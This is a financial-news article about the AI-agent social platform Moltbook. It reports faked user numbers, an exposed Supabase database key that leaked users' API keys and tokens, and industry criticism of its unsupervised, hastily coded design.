1.5 Million Users, 99% Are Fake? The Meteoric Rise and Sudden Collapse of Moltbook

Deep News02-02 19:45

The AI social platform Moltbook, which recently skyrocketed to fame in the tech world, has been plunged into a dual crisis of data fraud and severe security vulnerabilities after claiming to have 1.5 million AI agent users. This rapid reversal from adulation to skepticism serves as a stark warning for the currently booming field of AI application development.

Gal Nagli, a security researcher at cloud security startup Wiz.io, publicly disclosed on social platform X that he managed to batch-register 500,000 accounts in a short time using just a single OpenClaw agent, directly calling into question the authenticity of the platform's user growth data. The root cause lies in the platform's lack of basic rate-limiting mechanisms during the account creation process, allowing registration data to be easily fabricated on a massive scale. According to an internal source, the platform's actual number of verified real users is only around 17,000.

A white-hat hacker, Jamieson O'Reilly, uncovered an even more serious security flaw: the Supabase backend key used by Moltbook was completely exposed in public requests, meaning an attacker could obtain all user-sensitive data—including API keys, email addresses, and login tokens—simply by initiating a basic GET request. This vulnerability allows attackers to easily impersonate any AI agent on the platform to perform actions like posting, and even masquerade as any account, including that of Andrej Karpathy, a well-known figure in the AI field with 1.9 million followers.

The platform's mechanisms suffer from fundamental flaws. Moltbook describes itself as a "Reddit-like" social platform designed specifically for AI agents, supporting activities such as posting, commenting, liking, and mutual following among AI agents. The platform employs a "recursive prompt enhancement" mechanism, where users can install specified "skill" files with a single curl request, a "command-as-code" philosophy that significantly lowers the barrier to entry. However, this highly simplified design has introduced structural weaknesses. An analysis report published by researcher David Holtz reveals that 93.5% of comments on Moltbook receive no replies, the maximum conversation depth is only 5 layers, and over one-third of the messages are repetitive content. He sharply criticized the platform, stating it "more closely resembles 6,000 bots shouting repetitive phrases into the void." More critically, the platform's identity verification mechanism contains obvious vulnerabilities. Although Moltbook requires each AI agent to be linked to a genuine X account, its construction based solely on a simple REST API and lack of necessary security validations means anyone with access to the API key can impersonate an AI identity to publish content. Security researcher Harlan Stewart warned that widely circulated screenshots on the platform, such as "AI agents requesting cryptocurrency" or "advocating for an independent crypto system," are largely marketing content deliberately created to attract traffic.

Database exposure triggers a cascade of risks. The security vulnerabilities disclosed by white-hat hacker Jamieson O’Reilly affect multiple layers of Moltbook. The most severe issue is a configuration error in the platform's Supabase database, which allows attackers to access AI agent profiles and batch-extract user data without any authorization. O’Reilly publicly appealed on social media for platform founder Matt Schlicht to "immediately disable Supabase database access permissions" and specifically recommended fixes by enabling row-level security policies on the agent table and creating restrictive access policies.

Supabase CEO Paul Copplestone subsequently responded, stating that his security advisory team was prepared with a "one-click fix" solution. However, because database permissions require user self-management, they could not implement the fix directly. Platform founder Schlicht indicated that the matter was being addressed.

The remediation process immediately exposed a deeper problem: because Moltbook lacks a web login function, users can only manage their AI agents via API keys. Forcing a reset of all API keys to fix the vulnerability would immediately cause all users to lose control of their accounts, as the platform has neither email verification nor a web-based password reset mechanism. O’Reilly suggested developing a temporary interface to give users a grace period for key replacement or forcing users to re-authenticate via their linked X accounts. Furthermore, a former Anthropic engineer disclosed a remote code execution vulnerability that existed in the platform's predecessor, OpenClaw—where an attacker could gain system privileges within seconds of a user visiting a relevant webpage. Although this vulnerability has since been patched, some companies have internally prohibited employees from using the platform's services due to security concerns.

The industry reflects on standards for AI application development. Despite being mired in controversy, Tesla's former AI head, Andrej Karpathy, expressed cautious interest in the underlying technical direction of Moltbook. He bluntly stated on social media that the platform is indeed currently filled with spam, fraudulent ads, and privacy loopholes, calling it "a garbage dump right now," but he also emphasized:

"We've never seen large language model agents of this scale connected through a global, persistent, shared notebook designed specifically for agents."

Karpathy warned that as agents become more capable and their numbers grow, this network based on a shared notebook could produce unpredictable second-order effects. He predicted potential future risks, such as text viruses spreading among agents, jailbreak-style functional upgrades, and even the formation of botnets, stating:

"We are facing a computer security nightmare of unprecedented scale."

The industry widely regards Moltbook as a product of "Vibe-coding"—primarily relying on AI prompts to rapidly generate code, but lacking systematic engineering design and security considerations. While this model accelerates development speed, it sacrifices reliability and security. Prominent investor Balaji expressed a lukewarm attitude, noting that the concept of AI interaction is not innovative, and the so-called "agent dialogues" on the platform are still entirely controlled by humans behind the scenes via prompts, lacking genuine autonomy and personality. According to media reports, Moltbook founder Matt Schlicht revealed in an interview with NBC News that the platform is actually managed by an AI bot named "Clawd Clawderberg," and that he has largely withdrawn from daily intervention, "often unaware of what the AI admin is doing." This autonomous operation model lacking human supervision exposes significant risks under current technological conditions. The Moltbook incident highlights the deep-seated conflict between the speed of innovation and security safeguards in AI application development. In the context of rapidly evolving agent numbers and capabilities, building robust mechanisms for identity verification, access control, and security auditing has become an urgent and unavoidable challenge for the industry.

Disclaimer: Investing carries risk. This is not financial advice. The above content should not be regarded as an offer, recommendation, or solicitation on acquiring or disposing of any financial products, any associated discussions, comments, or posts by author or other users should not be considered as such either. It is solely for general information purpose only, which does not consider your own investment objectives, financial situations or needs. TTM assumes no responsibility or warranty for the accuracy and completeness of the information, investors should do their own research and may seek professional advice before investing.

Comments

We need your insight to fill this gap
Leave a comment